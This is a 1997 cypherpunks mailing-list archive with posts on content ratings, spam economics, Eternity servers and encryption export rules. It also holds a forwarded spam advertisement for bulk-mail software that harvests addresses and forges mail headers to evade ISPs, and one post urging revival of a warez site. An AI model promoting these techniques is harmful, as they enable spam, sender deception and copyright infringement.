>Microsoft-led industry group, is quickly emerging as a de facto 
>standard. 

The problem isn't with PICS, or with ratings, or even with RSAC.  The
problem is that nobody else is making the effort to set up alternative
rating systems.  This leaves RSAC as the only option, by default.

Let the free speech organizations demonstrate their commitment to 
their
cause by creating their own ratings.  Rank sites on the basis of their
support of freedom, or on how privacy-friendly their policies are.
Even formalize the geek code.  Do something, anyway.

The solution to bad speech is more speech.  Don't suppress, ban,
or oppose RSAC.  Provide alternatives.

Bubba






From may at zeta.org.au  Wed Aug  6 07:00:46 1997
From: may at zeta.org.au (Floodgate)
Date: Wed, 6 Aug 1997 07:00:46 -0700 (PDT)
Subject: Bulk Email For Profit
Message-ID: <19970806612WAA53359@post.pvallarta.icanet.net.mx>



To be removed, hit reply and type
"remove" in the subject.

***************************************
          
            MAIL THOUSANDS OF EMAIL MESSAGES
                PER HOUR - NO KIDDING !!

          SEND YOUR EMAIL MESSAGES OUT, AT
         1,000's MESSAGES / HOUR (28.8K modem)

           YES, 1,000's  Of Messages An Hour
     
That's right. We believe that there should be little
or NO restrictions on Internet communications and email!
Our two (2) software programs demonstrate the notion of
unlimited, uncensored, and unrestricted, bullet-proof
email use.

  YOU'LL RECEIVE 2 HIGH-SPEED EMAIL SOFTWARE PROGRAMS

Introducing...."FLOODGATE BULK EMAIL LOADER" 
        AND...."GOLDRUSH STEALTH MASS MAILER"

I operate a custom email service. From my experience, your typical bulk email service just collects email addresses from any source they can rely on shear volume emailing to produce the desired results - the "shotgun" approach. I have found that by targeting emails to groups that would likely be specifically interested in your product, the response rate is much better than when using the "shotgun" approach AND you don't tend to annoy as many people (which is nice for both sides). By targeting emails, I mean that I collect the addresses myself from on-line areas (forums, newsgroups, etc.) so that I mail to people that are likely to be interested in my products based on their on-line participation.

FLOODGATE is the renegade technology that helps me do this.

This is the same software that all bulk emailing services use!

----------------------------------------------------

Floodgate Bulk Email Loader Version 5.2 AND
Goldrush Stealth Mass Mailer Version 2.018
for Windows 95 and Windows 3.1 now Supports 17 
(really more with the free form filter) File Formats

----------------------------------------------------


SEND OUT 20,000+ MARKETING LETTERS EVERY SINGLE DAY!

Or...every few days. In fact, when I send out just a few thousand marketing letters each day, it doesn't take long before I'm completely swamped with email inquiries and phone calls. This is very easy to do. And each one of these bulk mailings costs me nothing. I can teach you how to do this and provide you with the tools you'll need.

If you've got a good marketing letter, I'll show you how to open the floodgates. You'll be deluged with inquiries, leads, and real sales, using nothing but email alone.

Writing a good marketing letter is not easy. I often have to rewrite my marketing letters a half dozen times before I get the results I'm looking for. But once you have a good letter, as you probably know, you can use the same letter over and over again, predictably and consistently, closing sales, week after week, month after month.

It takes me about one hour to send my marketing letter to THOUSANDS of fresh email addresses. I can do this, thanks to a Windows program I use. It's called Floodgate and Goldrush Stealth Mass Mailer. It's a bulk email loader and an email software program. If you're interested in electronic marketing, you should know about these programs.

PROGRAM #1: FLOODGATE FOR WINDOWS

The Floodgate Bulk Email Loader imports simple text files that anyone can download from CompuServe, Prodigy, Delphi Genie, or the Internet. These text files contain classified ads, forum messages, or data from the member directory. Each of these files is filled with email addresses.

Floodgate is designed to read these files and strip out the email addresses. It then sorts the addresses, removes any duplicates, and formats them into an output file, with 10, 20 or 30 addresses per line. This is all done in one simple step. Just point and click.

You'll need either a Windows based Internet account or an America On-line account to send out your marketing letters. Neither AOL nor the Internet charges to send email. Send your letter to 1,000 people or 10,000 people -- the cost is always the same. NOTHING!

NEW! PREPARE A MAILING OF 50,000+ 
IN LESS THAN A 1/2 HOUR

If you open an Internet account, you can send each letter to 20,000+ people. The new Floodgate now directly writes distribution lists. Some people are always collecting new addresses, but if you publish a newsletter or adsheet, you'll be using the same addresses over and over again. That's real power! When using addresses you've previously collected, you can press a few buttons and prepare a mailing of 50,000+ in less than a half hour.

(To get a list of all the Internet access providers in your local calling area goto: http://thelist.com and click on your area code.)

The Floodgate Users Guide will teach you, step by step, how to download the right files, how to strip the addresses, and finally, how to cut and paste the formatted addresses into your marketing letter. Or, if you have an Internet account, how to create distribution lists. One you've done this a few times you won't even have to think. It's that simple!

FOR THE BRAVE & DARING: PUSHING TECHNOLOGY TO ITS LIMITS

As you may know, the practice of sending unsolicited email is usually frowned upon, and most service providers have rules against it. But, like jay-walking, there is little enforcement. It's not illegal. If someone tells you that it is, ask them to provide the citation (and don't let them give you some nonsense about faxes - that's not email). They can't do it because it's not there. Sometimes, when a lot of people complain, I get a warning letter. And that's about it.

About 1 in 200 will write back and tell me, "take me off the list", which I can do, thanks to Floodgates Remove List feature. Many people reply back thanking me for sending them my informative letter. That's always nice. Most people though, just reply and say, "send me more info." In this way, it usually takes me two or three letters to close a sale.

The Floodgate Users Guide will provide you with proven formats for writing a successful marketing letter. You'll test and rewrite, test and rewrite. Then, once you've got it, just push a few buttons, and open the floodgates!!!

THE FLOODGATE BULK EMAIL LOADER CURRENTLY SUPPORTS 17+ FILE FORMATS

1. CompuServe Classifieds: Send your marketing letter to everyone who is running a classified ad. I'll teach you how to download all the classifieds from any single ad category. This is one of the most responsive list of buyers. They check their email every day and they're already in business.

2. America On-line Classifieds: Download 1,000 addresses in 15 minutes. These are excellent lists for business to business sales.

3. CompuServe Forums: You can join a forum and download hundreds of forum messages in a matter of minutes.

4. America On-line Forums: Choose from dozens of forums. All good targeted lists.

5. Prodigy Forums: Prodigy allows you to easily export any group of forum messages. More targeted lists.

6. Internet Newsgroups: These are all targeted lists. You'll be able to send your marketing letter to everyone who posts a message in any newsgroup. Easily collect 1,000's of addresses per hour.

7. America On-line Member Directory: Most member directories only allow you to search by city and state. With AOL, you can search by business type, hobbies, computer type, etc. This is the gem of all
member directories. Build huge targeted lists.

8. CompuServe Member Directory: This is a major resource. If you're willing to target your mailing to a single city, you can collect about 1,000 email addresses an hour.

9. Delphi Member Directory: The Delphi member directory allows you to search for people based on key words. These are good targeted mailing lists. A single search can easily generate 5,000 addresses.

10. Genie Member Directory: Similar to the CompuServe member directory, only you can download names much quicker. You can easily pull hundreds of thousands of addresses out of each of these member directories.

11. CompuServe File Cabinet: If you run classified ads, and save the responses in the CIM file cabinet, you'll be able to easily reuse these addresses. You can send your marketing letter to everyone in any single folder. Build master lists and clean UP your hard drive.

12. Free Form: If you have a text file with email addresses that floodgate does not support, chances are the Free Form filter will be just what you need. Just enter a key word to search for.

13. CompuServe Form Profiles (Forum Membership Directories): Easy to build targeted lists here. Each search can easily bring you 500+
addresses.

14. Genie Profiles: If you're building targeted lists, you'll get a lot of addresses very quickly from Genie.

15. Plain Addresses: Read Floodgate Master Files back into Floodgate to merge files and do selective mailings. Also useful for the management of email address lists that you might purchase.

Floodgate also has filters to allow you to include or exclude any groups of addresses in your final distribution lists. For example, you could include only email addresses that ended in .com or exclude all with .gov. You could exclude all noc, root, and other addresses that almost guarantee a negative response. These filters are fully configurable and can be used together.

BUILD REUSABLE MASTER FILES

Floodgate maintains Master Files for each of your marketing letters. If you download from the same place on a regular basis, you only want to send your letter to the new people. Floodgate will compare the new addresses with those in the Master File, and prepare a mailing list of only new people. The new addresses are, of course, then added to the Master File. With each new mailing your Master File grows and grows.

You may create as many Master Lists as you need. When you start a new marketing campaign, you'll want to send your new letter to everyone on your Master List. If you write a newsletter, each time you send your newsletter, you'll send it to everyone on a Master List.

THE REMOVE LIST

Very often, people will reply and tell you to take them off your mailing list. Place these addresses in the REMOVE.MST file and they will never receive another letter from you again. In this way, you will be operating your business with the most professionalism
possible.

DON'T BE FOOLED

We have some new competitors that have tried to copy Floodgate. The following list describes why Floodgate is BETTER.......

**Floodgate is a mature, bug free product. Not an initial release.
**Floodgate comes with over 100 pages of step by step       documentation.
**Floodgate is the only one offering a money back     guarantee.
**Floodgate has more testimonials. 
**Filter for filter, Floodgate offers more capabilities,   way more. 
**Floodgate does everything all the others *combined* claim. 
**Floodgate is by far the easiest to use.
**There is NO *cutting and pasting* with Floodgate. 
**We have by far, the BEST technical support.

SOME QUICK MATH

Floodgate can pay for itself in a few days. It can also cut your advertising costs down to almost nothing. Think of what the competition will do when they get their Floodgate program. Don't be left in the dust - there are 75 million people out there, just a few keystrokes away. Let's do the math:

- Email 50,000 sales letters (takes about 1-2 hours)
- Let's say your product will bring you $5 profit per   sale.
- Let's also say you only get a 1% response   (occasionally higher).

* That's 500 orders x $5 = $2,500 profit !! Now imagine what 500,000 letters would do for your business !!

WHAT CAN I MARKET ON-LINE?

You can market anything on-line using direct email, that can be marketed using conventional postal direct mail marketing. The possibilities are practically endless. If it sells off-line, you can sell it on-line.

EASY TO INSTALL AND EASY TO LEARN

The Floodgate Email Loader requires Windows. The SUPPLIED MANUAL tells you where to go, what to do, and how to do it. All you need are basic computer skills that can be learned with a little practice or help from our computer savvy technicians.

PROGRAM #2: GOLDRUSH STEALTH MASS MAILER

Do not get this program confused with other slow speed programs that call themselves "STEALTH". This program is the only one in the world that can send email out at HIGH SPEEDS with one single connection to the internet. 

This is NEW, Cutting Edge Email Technology. First Of It's Kind.. The Most Powerful BULK EMAIL SENDER In The World.. NOTHING CAN EVEN COME CLOSE! 

Thanks to our top programmer's, this technology is NOW available and we are the only place you can get it from! 

     *ONLY "ONE" DIAL-UP OR ISDN CONNECTION NEEDED. 
     *NO MORE TERMINATED CONNECTIONS. 
     *NO MORE WAITING TO SEND LARGE AMOUNTS OF EMAIL. 
     *IMMEDIATE RESPONSE TO YOUR MASS MAILINGS. 
     *YOU WILL HAVE ALL THE CONTROL AND CONFIDENCE OF               SENDING EMAIL THE WAY IT SHOULD BE SENT... IN HUGE AMOUNTS! 
     *SEND YOUR WHOLE LIST IN ONE DAY, WHETHER IT BE                500,000 OR 5 MILLION - AND JUST SIT BACK AND WAIT FOR YOUR       ORDERS TO POUR IN. 
     *NO MORE DOWNLOADING UNDELIVERABLE NAMES.

Bulk Emailer's Dream Come True!!! - >>>GOLDRUSH STEALTH MASS MAILER<<< 

Connect to multiple mail servers (20 or more), make multiple connections to a single server or any combination of the two ( All Simultaneously ) with one single dial-up connection. 

SEND MULTIPLE SIMULTANEOUS MAILINGS... 

View complete details about your mailings. Shows each server your connected to, the status of that connection, how many messages are going out through that connection, etc...

We show you ALL the tricks all the mass e-mailers don't want you to know... 

Here are just a few features the GOLDRUSH STEALTH MASS MAILER offers to you... 

     *Forge the Header - Message ID - ISP's will Spin their wheels. 
     *Add's a Bogus Authenticated Sender to the Header. 
     *Add's a complete bogus Received From / Received By line with       real time / date stamp and recipient to the Header. 
     *Does NOT require a valid POP Account be entered in order to       send your mailings. 
     *Easy to use and operate 
     *Plus much more! 

All this, at speeds of up to 1,000's messages/hour
(28.8k modem). 

SPECIAL INTRODUCTORY PRICE... 

NOW YOU CAN HAVE BOTH THE FLOODGATE AND GOLDRUSH STEALTH MASS MAILER FOR JUST $499.00! 

UPDATE ... SAVE $149.05 AND ORDER NOW, BE ONE OF THE FIRST 100 ORDERS! 

Step up to the plate and play with the big boys TODAY and receive the COMPLETE 2 SOFTWARE PACKAGE for the unbelievably low price of ONLY $349.95! 

(Other bulk email software has sold for as much as $2,500 and can't even come close to the cutting edge technology of EASE, ACCURACY AND SPEED ... SPEED ... SPEED!) 

       Try the Goldrush Stealth Mass Mailer & Floodgate Bulk Email Loader for 10 days FREE. 
        And receive UNLIMITED technical support for 30 days.

***SPECIAL BONUS #1:*** STOP Losing ISP Dial Up Accounts! 

If you order The FLOODGATE / GOLDRUSH software within the next 5 days - When you receive your program, you will also receive: 

*Complete instructions on "how to keep your dial up account from  showing up in the header", plus everything you will need to get started doing this. 

IMPORTANT NOTICE! We will initially only be offering 100 copies of the program for sale, First come / First Served basis only. We are doing this because of the extreme power that these programs offer.

***SPECIAL BONUS #2*** 

When you receive your two programs, you will also receive:
OVER 250 REPRINT AND RESELL RIGHTS REPORTS YOU CAN START TO MARKET
AND MAKE MONEY IMMEDIATELY!!! 

     These HOT sellers include: 
     1) How to Get a Top Rating in the Search Engines 
     2) 70 Money Making Reports 
     3) 75 MONEY MAKING PLANS & TRADE SECRETS and MUCH MUCH MORE!!!         ($200 RETAIL VALUE - FREE!!!) 

***SPECIAL BONUS #3***

With your two software programs, you will also receive our NEW "Address Grabber" utility program that enables you to grab 100's of THOUSANDS of email addresses from
newsgroups in minutes ($100 RETAIL VALUE - FREE).


         ***************************************************

To get your FREE demo and "test drive" our state-of-the-art software, fax your request for the demo giving us your 
email address to:
              
        		954-255-3713

         ****************************************************

              HURRY ... RESERVE YOURS TODAY! 

So, if you are interested in taking advantage of the most powerful bulk email software
in the world and start making money hand over fist.....

Print out the EZ ORDER form below and FAX or MAIL it to our office.

If you have any questions don't hesitate to call us at: 1-954-341-2924

SYSTEM REQUIREMENTS

386 or larger
Windows 95 OR Windows 3.1 with 8 meg ram
Extra 5 MB hard drive space

Floodgate & Goldrush can be run on a fast Mac with 24 MB RAM and SoftWindows.

NOTES FROM SATISFIED USERS

"It is everything you said it was. Within one week of my first mailing, I received a record number of orders. All you need to print money is a decent sales letter. Thanks." Randy albertson, Wolverine Capital.

"After using Floodgate and your utility program all day today, let me say these are as two of the finest programs I have ever bought in my 52 years! Your support has been superb. Thank You!" Vernon Hale, Prime Data Systems

"My first day and I just used Floodgate and Pegasus to send 1,469 sales letters. So far I've got about 25 positive responses. It works GREAT!!! Thanks." Donald Prior

"Floodgate is awesome!. I recently started a new business on-line. I stripped the addresses of the AOL & CIS classifieds. I sent out 3,497 email letters and got over 400 people to join my company in 5 days! Needless to say, it pays for itself." David Sheeham, OMPD

"I was able to use Floodgate to extract the names from the Internet news groups. It works perfectly. Needless to say, I am very excited about the use of this new technology." Mark Eberra, Inside Connections

"This is a great piece of software and an invaluable marketing tool." Joe Kuhn, The Millennium Group

"I just thought you'd like to know that this program is fantastic. After loading it on my system, I wanted to test it out. In my first hour of using this, I collected 6,092 email addresses!" Richard Kahn, LD Communications

"I just love the Floodgate program. It saves me hours and hours of time. This is the beginning of a wonderful FUN time marketing on-line. Thank you so much for writing this program." Beth O'Neill, Eudora, KS

"Your software is brilliant, and from the technical support I've received, I can see you have a genuine love and respect of people...Floodgate is a divine package. Wish I had found it sooner." Tom Sanders, Peoria, IL

"I really like the way the Floodgate software package works. It is very easy to use, and really does the trick. It has already saved me an incredible amount of time and energy." John Berning, Jr., Fairfield, NJ

"It's going great with FLOODGATE! I like using Delphi. I just collected 50,000+ addresses within 20 minutes on-line." Richard Kahn, R&B Associates

-------------------------------------------------
E-Z ORDER FORM:

Please print out this order form and fill in the blanks......
Please send order form and check or money order, payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077-2261
(954) 341-2924


______Yes! I would like to try your cutting-edge software so that I can advertise my business to thousands of people on-line whenever I like! I understand that I have 10 days to trial the 
software. If I am not fully delighted, I will 
cheerfully be refunded the purchase price, no
questions asked! Please rush me the FLOODGATE and GOLDRUSH package now!

______I am ordering within 72 hours! That qualifies me to receive the FLOODGATE and GOLDRUSH package at a substantial discount! I am ordering BOTH software packages for only $349.95. (Save $150 off the retail price....Software has sold for as much as $2,499.95)

______I am ordering within 72 hours! That qualifies me to receive free lifetime technical support.

______I want to receive the package OVERNIGHT. I'm including $18.00 for shipping charges.

______I want to receive the package 2nd DAY. I'm including $3.00 for shipping charges.

(CHECKS: ALLOW 1 WEEK FOR BANK CLEARANCE)


YOUR NAME_________________________________________________

COMPANY NAME_________________________________________________

YOUR POSITION_____________________________________________

STREET ADDRESS______________________________________________

CITY, STATE, ZIP__________________________________________________

PHONE NUMBERS_______________________________________________

FAX NUMBERS_______________________________________________

EMAIL ADDRESSES_____________________________________________

We accept Checks or Money Orders by mail.

I agree to pay Dave Mustachi an additional $29 fee if my check is returned for insufficient or uncollectable funds.

SIGNATURE: X________________________________DATE:_______________

Please send all order forms and check or money order to payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077
(954) 341-2924


***************************************************

OR:

PLEASE PASTE YOUR CHECK HERE

(If you fax a check, there is no need for you to send the original check by mail. We will draft up a new check, with the exact information from your original check that you faxed to us)

Please fax the above order form and check to: 1-954-255-3713


Message-ID: 


A couple of minor nits in an otherwise excellent article:

Adam Back  writes:

>    So using USENET allows you to point the finger and say "it's not my
>    material, it's just USENET posts".  Much like altavista doesn't
>    issue cancel messages for posts in USENET news, it's not their
>    problem, they're just providing a view onto a distributed database.

As far as I can determine, dec's altavista does process cancels - not a good
way to use Usenet these days. :-(  However Dejanews doesn't process cancels.

>    Just look at the Scientologist battles.  It's simply amazing the
>    bravery of the Scientologist detractors in face of types of
>    harrasement thrown at them.

{Ex-Anti-}Scientologists are scum too. If they weren't nuts, they wouldn't
have joined the cult in the first place.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From kent at songbird.com  Tue Aug  5 16:43:46 1997
From: kent at songbird.com (Kent Crispin)
Date: Wed, 6 Aug 1997 07:43:46 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <19970802092944.06562@bywater.songbird.com>
Message-ID: <19970805161821.15943@bywater.songbird.com>



On Tue, Aug 05, 1997 at 10:28:02AM -0700, stewarts at ix.netcom.com wrote:
> >Kent Crispin  writes:
> >> In more general terms: A "free market" fundamentally grants more
> >> control to those with more money.  Postage of whatever variety turns
> >> the medium over to those with more money.  That would, in my opinion, 
> >> fundamentally alter the character of email in a strongly negative 
> >> direction. 
> 
> More to the point, if you're charging prices that don't reflect the
> true costs of the activities, it'll catch up with you after a while;

I am, of course, familiar with this line of reasoning :-).  

However, it is arguably the case that the true cost of email *is*
being paid.  The real problem is that email is unbelievably cheap, for
both recipient and sender -- a sender can send more mail than anyone
can read at a very low cost, and a recipient can easily receive more
mail than they can possibly read, again for a very low cost.  

[...]

> The present situation is that the social dynamics and economics are such
> that Tacky People can make money by being rude to everyone without being 
> interesting in return.  While trying to charge money for communications
> may work, I'm inclined to doubt it; the more interesting currency to
> try to model is Reputation, which leads to more like an Ender's Game
> kind of net, or to semi-closed communities like the Well (is?was?).

Yes, virtual cryptographically closed communities.  A concept whose
time has come, perhaps. 

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From aba at dcs.ex.ac.uk  Tue Aug  5 16:46:21 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 6 Aug 1997 07:46:21 +0800
Subject: eternity-0.08 up, more beta testers?
Message-ID: <199708052310.AAA07511@server.test.net>




We are now on eternity-0.08.  See:

	http://www.replay.com/aba/eternity/

and	http://www.dcs.ex.ac.uk/~aba/eternity/ for the software.

It's now much easier to install there are even some instructions on
what to do in the README.  There is now a configure script which
greatly simplifies installing.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0





---------- Forwarded message ----------
Date: Tue, 5 Aug 1997 16:35:00 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: Microsoft postpones plans to include RSACnews in Explorer

[Note that Microsoft still plans to include RSACnews in Explorer 5.0.
--Declan]

---------- Forwarded message ----------

Inter at ctive Week
August 5, 1997

Microsoft Tables 'News' Rating System For Explorer

By Steven Vonder Haar 1:30 PM EDT

Microsoft Corp. has tabled plans to include new technology in its
Internet Explorer 4.0 browser that would have made "news" oriented
sites exempt from content rating standards promoted for use on the
Internet.

Officials at leading media companies, including Time Warner Inc. and
Dow Jones & Co., have lobbied industry leaders during the past month
in an effort to generate support for an approach that would exclude
news sites from content rating systems such the one promoted by the
Recreational Software Advisory Council (RSAC).

The media companies, rallied by the Internet Content Coalition
industry group, contend that the ratings are the equivalent of private
censorship that will eventually cut into freedom of speech rights on
the Internet.

"No one puts a filter over the mailbox to determine whether Time
magazine is appropriate for our audience," said Dan Okrent,
editor-in-chief at Time Inc. New Media. "The same standards should
apply to the Internet."

RSAC's current rating tool is integrated into the current Explorer
browser. It allows parents to block access to content based on RSAC
ratings. Sites that do not carry RSAC ratings also can be blocked.

RSAC recently came up with a "news" category designed to allow display
of news content without suitability ratings for individual stories.

RSAC President C. Dianne Martin said Microsoft is running out of time
to implement the separate designation for news sites before the launch
of the 4.0 version of Explorer later this year. However, the company
plans to include the news designation in the 5.0 version of Explorer
when it is made available, likely sometime next year.

RSAC can be reached at www.rsac.org

Microsoft can be reached at www.microsoft.com








From enoch at zipcon.net  Tue Aug  5 17:12:21 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Wed, 6 Aug 1997 08:12:21 +0800
Subject: Eternity's 15 Minutes of Fame
In-Reply-To: <19970805235827.11932.qmail@zipcon.net>
Message-ID: <19970806000149.14388.qmail@zipcon.net>



Correction....

>          http://www.replay.com/~aba/eternity

Adam's server is http://www.replay.com/aba/eternity.  No "~".

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From enoch at zipcon.net  Tue Aug  5 17:12:49 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Wed, 6 Aug 1997 08:12:49 +0800
Subject: Eternity's 15 Minutes of Fame
Message-ID: <19970805235827.11932.qmail@zipcon.net>



There is a short piece by "Wired News" on the Eternity servers. 

   http://www.wired.com/news/news/technology/story/5778.html

I should add that all Eternity servers...

         http://www.zipcon.com/~enoch/eternity
         http://www.replay.com/~aba/eternity
and      http://eternity.insync.net/eternity

now have pretty icons and a more attractive format. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}







From jya at pipeline.com  Tue Aug  5 17:58:49 1997
From: jya at pipeline.com (John Young)
Date: Wed, 6 Aug 1997 08:58:49 +0800
Subject: JYA Up
Message-ID: <1.5.4.32.19970806003415.00689254@pop.pipeline.com>



AOL/PrimeHost has reactivated JYA.

AOL's story for the takedown is that our seldom used ftp 
component was being used by unidentified parties to traffic in 
warez and that it had nothing to do with the http part, "whose 
content does not concern us."

Still, it's odd we did not get a call about the problem as was done
a few weeks ago for a similar warez invasion. At that time, we 
offered to close our ftp, but the PrimeHost rep said no, we'll monitor 
it, as we do other ftps. I specifically asked to be notified if it
happened again, but wasn't. And it's not clear why it took a
week for me to find out what was what. Or why not AOL did not
just close the ftp and leave the http operating.

'Course, maybe the  takedown was signal of distrust of JYA
innocence. And a warning.

Thanks to the folks who offered more help than the teapot
tempest seems to have warranted -- so far.






From ravage at ssz.com  Tue Aug  5 18:03:08 1997
From: ravage at ssz.com (Jim Choate)
Date: Wed, 6 Aug 1997 09:03:08 +0800
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes (fwd)
Message-ID: <199708060050.TAA03620@einstein.ssz.com>



Forwarded message:

> From: bpettigrew at usa.net
> Date: Tue, 05 Aug 1997 15:23:52
> Subject: Re: "A new battle over keeping the Net clean," by J.Weber/LATimes

> Let the free speech organizations demonstrate their commitment to 
> their
> cause by creating their own ratings.

We are, by simply not rating ourselves and refusing to support others rating
systems.

Hint: FREE speech

                                                     Jim Choate
                                                     The Armadillo Group
                                                     ravage at ssz.com






From wcreply at ctia.org  Tue Aug  5 19:08:23 1997
From: wcreply at ctia.org (wcreply at ctia.org)
Date: Wed, 6 Aug 1997 10:08:23 +0800
Subject: No Subject
Message-ID: <199708060141.VAA05919@intraactive.com>



=============================================================
This update is sponsored by IBM   http://www.wow-com.com/professional/systemint/
=============================================================


Dear WOW-COM Reader:

WOW-COM(TM) is the wireless industry�s online information source, a free service of CTIA.  Find out what's going on in the wireless industry by visiting http://www.wow-com.com/welcome today!

INDEX:
======
1) Upcoming Conference: CTIA's WIRELESS FRAUD '97

2) The Battle continues: Antenna Siting

3) CTIA Supports New Tauzin Legislation to Catch and Prosecute
 Electronic Stalkers
	

WIRELESS FRAUD '97 Conference
=========================================================
http://www.wow-com.com/professional/fraud/

WIRELESS FRAUD '97 Conference is September 28 through October 2 in Orlando, FL.  If you have not made your plans to be where the industry is going to be,  MAKE THEM NOW  because yesterday's wireless fraud solutions may not solve tomorrow's problems. Authentication is helping, so is RF Fingerprinting and other technologies. Despite our successes, wireless criminals haven't given up.  Come to Orlando and WIRELESS FRAUD '97 the last week of September and learn how you can combat fraud.  For more details please see complete information on www.wow-com.com's Fraud Microsite, or call (202)-785-0081 .

The Latest on the Antenna Siting Battle "Now Is the Time for Action, Not Inquiry" 
==========================================================
http://www.wow-com.com/professional/whatshot/

FCC grants CTIA petition challenging local zoning  moratoriums and seeks further comments.  CTIA Says: Further comment spells further delay.  Read the whole story here.

Electronic Stalking and the Wireless Privacy Enhancement Act of 1997
===================================================
http://www.wow-com.com/professional/

Earlier this year, CTIA President and CEO Thomas E. Wheeler testified before Rep.
Tauzin�s subcommittee, urging Congress to close a loophole that permitted what he termed "electronic stalking."  Tauzin�s legislation clarifies and tightens current law to ban the manufacture, modification, sale and use of equipment used to illegally intercept private, protected conversations over wireless phones . 


=============================
MORE WOW-COM(TM) FEATURES
=============================
WOW-COM(TM) is current: Updated 3x per day.
WOW-COM(TM) is insightful: CTIA�s unbiased analysis 
WOW-COM(TM) is beneficial: Find products and services in  WOW-COM(TM)'s Virtual 
Trade Show.   List open positions in the WOW-COM(TM) Career Center, get resumes 
via email, and hire qualified individuals.

The world of wireless is in constant motion.  Stay on top of the news and benefit from CTIA�s analysis by reading WOW-COM(TM) everyday.  You may remove yourself from the WOW-COM(TM) mailing list by going to http://www.wow-com.com/unsubscribe
========================================================

This update sponsored by: IBM
http://www.wow-com.com/professional/systemint/

Today, more than ever, wireless carriers must remain flexible and respond rapidly to changing market conditions. Your success will depend on understanding your strategic opportunities and threats and quickly responding to them. To accomplish this, a wireless carrier must build links  that are sophisticated, comprehensive and flexible. This is no small endeavor. IBM has developed a general multilevel blueprint of a wireless company to assist wireless carriers pursuing this goal. Take a look at how we can help you achieve your goals.








From azur at netcom.com  Tue Aug  5 19:26:34 1997
From: azur at netcom.com (Steve Schear)
Date: Wed, 6 Aug 1997 10:26:34 +0800
Subject: Eternity Content Suggestions
In-Reply-To: 
Message-ID: 



At 4:16 PM +1000 8/5/97, ? the Platypus {aka David Formosa} wrote:
>Warner Brothers has been shutting down any sites that even
>hint of sex in relation to any of there cartoon caritors.  Although thay
>clame it is to enforce tradmarks thay only will go after sites with a
>sexulial content.

About a year ago a very popular sheet music warez site, being hosted at
Uiveristy of Nevada Las Vegas, was taken down due to publisher pressure.  A
resurection is surely in order.

--Steve







From stewarts at ix.netcom.com  Tue Aug  5 19:27:39 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 6 Aug 1997 10:27:39 +0800
Subject: Canada's Entrust does end-run around ITAR
In-Reply-To: <199708020443.VAA10553@netcom13.netcom.com>
Message-ID: <3.0.2.32.19970805174155.0077faa0@popd.ix.netcom.com>



At 09:43 PM 8/1/97 -0700, Vladimir Z. Nuri wrote:
>NY Times
>August 1, 1997
>Canadian Product Puts New Spin on Encryption Debate
>By PETER WAYNER 
...

Thanks for posting the article - it's an interesting product to
play with.

However, "end run" isn't the right metaphor -
it's a different ball field, it's Canadian Football now,
and the Yankees don't have the home field advantage any more
and can't keep making up silly rules like having to hand the ball
to the FBI Halfback to check for Commies under it before passing it.

It's true there are some silly Canadian rules, like the
Canadian Content bit, but PGP could satisfy that by 
replacing the Keygen.avi movie with someone singing "Oh, Canada"... :-)



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From wcreply at ctia.org  Tue Aug  5 19:48:22 1997
From: wcreply at ctia.org (wcreply at ctia.org)
Date: Wed, 6 Aug 1997 10:48:22 +0800
Subject: WOW-COM(TM) News Update
Message-ID: <199708060231.WAA12437@intraactive.com>



=============================================================
This update is sponsored by IBM   http://www.wow-com.com/professional/systemint/
=============================================================


Dear WOW-COM Reader:

WOW-COM(TM) is the wireless industry�s online information source, a free service of CTIA.  Find out what's going on in the wireless industry by visiting http://www.wow-com.com/welcome today!

INDEX:
======
1) Upcoming Conference: CTIA's WIRELESS FRAUD '97

2) The Battle continues: Antenna Siting

3) CTIA Supports New Tauzin Legislation to Catch and Prosecute
 Electronic Stalkers
	

WIRELESS FRAUD '97 Conference
=========================================================
http://www.wow-com.com/professional/fraud/

WIRELESS FRAUD '97 Conference is September 28 through October 2 in Orlando, FL.  If you have not made your plans to be where the industry is going to be,  MAKE THEM NOW  because yesterday's wireless fraud solutions may not solve tomorrow's problems. Authentication is helping, so is RF Fingerprinting and other technologies. Despite our successes, wireless criminals haven't given up.  Come to Orlando and WIRELESS FRAUD '97 the last week of September and learn how you can combat fraud.  For more details please see complete information on www.wow-com.com's Fraud Microsite, or call (202)-785-0081 .

The Latest on the Antenna Siting Battle "Now Is the Time for Action, Not Inquiry" 
==========================================================
http://www.wow-com.com/professional/whatshot/

FCC grants CTIA petition challenging local zoning  moratoriums and seeks further comments.  CTIA Says: Further comment spells further delay.  Read the whole story here.

Electronic Stalking and the Wireless Privacy Enhancement Act of 1997
===================================================
http://www.wow-com.com/professional/

Earlier this year, CTIA President and CEO Thomas E. Wheeler testified before Rep.
Tauzin�s subcommittee, urging Congress to close a loophole that permitted what he termed "electronic stalking."  Tauzin�s legislation clarifies and tightens current law to ban the manufacture, modification, sale and use of equipment used to illegally intercept private, protected conversations over wireless phones . 


=============================
MORE WOW-COM(TM) FEATURES
=============================
WOW-COM(TM) is current: Updated 3x per day.
